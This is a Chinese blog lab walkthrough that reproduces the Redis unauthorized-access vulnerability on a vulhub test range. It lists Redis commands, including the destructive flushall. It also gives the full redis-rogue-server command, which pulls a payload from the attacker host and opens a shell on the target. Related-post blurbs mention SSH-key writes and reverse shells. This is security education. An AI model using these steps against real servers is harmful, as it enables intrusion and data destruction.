Redis未授权访问漏洞

已于 2024-08-03 19:40:48 修改
阅读量252 收藏 5
点赞数 4
分类专栏: 二十五个未授权访问合集 文章标签: redis 缓存 网络安全
于 2024-08-03 19:28:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/140893378
版权

Redis未授权访问漏洞

靶场IP:192.168.30.138
kali的IP:192.168.30.129

搭建靶场环境

进入目录:cd/vulhub-master/redis/4-unacc
启动:docker-compose up-d
检查:docker-compose ps
vi docker-compose.yml  //查看端口和版本号

在这里插入图片描述
开启成功
在这里插入图片描述

安装redis工具

在kali上安装redis进行服务链接

#安装redis
apt-get install redis

#redis使用
redis-cli -h 192.168.30.137  -p 6379

#redis常见命令
	(1)查看信息:info
	(2)删除所有数据库内容:flushall
	(3)刷新数据库:flushdb(3)
	(4)看所有键:KEYS *,使用select num可以查看键值数据:
	(5)设置变量:set test"whoami"
	(6)config set dir dirpath 设置路径等配置
	(7)config get dir/dbfilename 获取路径及数据配置信息
	(8)save保存
	(9)get 变量,查看变量名称

在这里插入图片描述

步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞----->下载以下攻击项目…
https://github.com/n0b0dyCN/redis-rogue-server
可以下载git源码或者压缩包

 git clone https://github.com/n0b0dyCN/redis-rogue-server.git

步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i键会获取Shell环境

python3 redis-rogue-server.py --rhost 192.168.30.138 --lhost 192.168.30.129

在这里插入图片描述
然后就可以输入命令获取信息了
在这里插入图片描述

redis授权访问漏洞
南街日暮的博客
05-01 132
WEB网站根目录写入一句话木马,从而得到WEB网站权限。检测连接成功:ping–>pong。Redis服务默认端口:6379。写入SSH公钥,实现免密登录。定时任务反弹shell。
redis授权访问漏洞【vulhub靶场】复现
m0_55854679的博客
08-01 998
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上;如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹
02-Redis授权访问漏洞
qq_57410330的博客
07-16 1068
详谈redis授权访问漏洞,原理、利用及加固方式
Redis授权访问漏洞复现
weixin_55123346的博客
06-26 1351
Redis漏洞复现
redis授权访问漏洞复现
zkaqlaoniao的博客
06-27 534
攻击者在授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务器登录目标服务器(1) Redis绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
redis 授权访问漏洞
weixin_60719780的博客
03-02 2166
Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
Redis授权访问漏洞实验
qq_60256199的博客
10-09 3300
Redis是一个开源的内存数据库管理系统,它被广泛用于缓存、消息队列和实时数据分析等应用场景。Redis支持多种数据结构,包括字符串、列表、集合、有序集合和哈希表,可以通过简单的键值对方式存储和检索数据。由于其高性能和低延迟特性,Redis常用于加速数据访问,提高应用程序的响应速度。此外,Redis还提供了持久化选项,允许数据在重启后仍然可用,使其适用于各种持久性存储需求。这一特性使得Redis成为了一个非常强大的数据存储和缓存解决方案,特别适用于需要快速读写操作的应用场景。
redis 授权访问漏洞详解
m0_69043895的博客
04-22 1489
1、redis 绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网。2、没有设置密码认证(默认密码为空),可以免密码远程登录redis服务。
Redis授权访问漏洞复现和修复建议
M372109150的博客
11-03 1215
本文介绍了redis授权漏洞的原理、条件、危害和影响版本,并给出了实战中的redis常用命令和配置文件参数。还包括环境搭建和漏洞利用的过程,包括授权访问、写入SSH公钥和反弹shell等攻击方式。
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
官方压测工具memtier-benchmark压测redis
nangonghen的博客
11-11 878
memtier_benchmark压测redis
Redis
m0_73837751的博客
11-14 661
String:简单键值存储,适合计数器、单一属性缓存。Hash:结构化存储,适用于存储对象数据(如用户信息)。List:有序队列,适合消息队列、任务队列。Set:无序集合,用于去重、唯一性统计、共同好友等。Sorted Set:有序集合,适合排行榜和积分排名。问题类型描述主要解决方案缓存穿透请求的数据既不在缓存中也不在数据库中,大量请求穿过缓存访问数据库缓存空结果、布隆过滤器、参数校验缓存击穿高并发请求集中访问缓存中某个热点数据,缓存过期导致直接访问数据库。
Redis_Day4】内部编码和单线程模型
最新发布
m0_74284629的博客
11-15 386
本篇总结了redis中的内部编码是什么,redis处理命令时采用的单线程模型,以及redis比mysql效率高的原因。
@Autowired 和 @Resource思考(注入redisTemplate时发现一些奇怪的现象)
2301_77615930的博客
11-15 486
@Autowired 和 @Resource思考(注入redisTemplate时发现一些奇怪的现象)
36.Redis核心设计原理
Csdn_xzh的博客
11-12 1199
Set为无序的,自动去重的集合数据类型,Set 数据结构底层实现为一个value为x`的字典(dict),当数据可以用整形表示时,Set集合将被编码为intset数据结构。ZSet 为有序的,自动去重的集合数据类型,ZSet 数据结构底层实现为字典(dict)+跳表(skiplist),当数据比较少时,用ziplist编码结构存储。ZSet 为有序的,自动去重的集合数据类型,ZSet 数据结构底层实现为 字典(dict) + 跳表(skiplist) ,当数据比较少时,用ziplist编码结构存储。
高级java每日一道面试题-2024年11月04日-Redis篇-Redis如何做内存优化?
qq_43071699的博客
11-12 1055
Redis内存优化主要是指通过一系列策略和技术,减少Redis内存的使用,提高内存利用率,从而优化Redis的性能和稳定性。在面试中,了解并掌握这些优化策略是非常重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值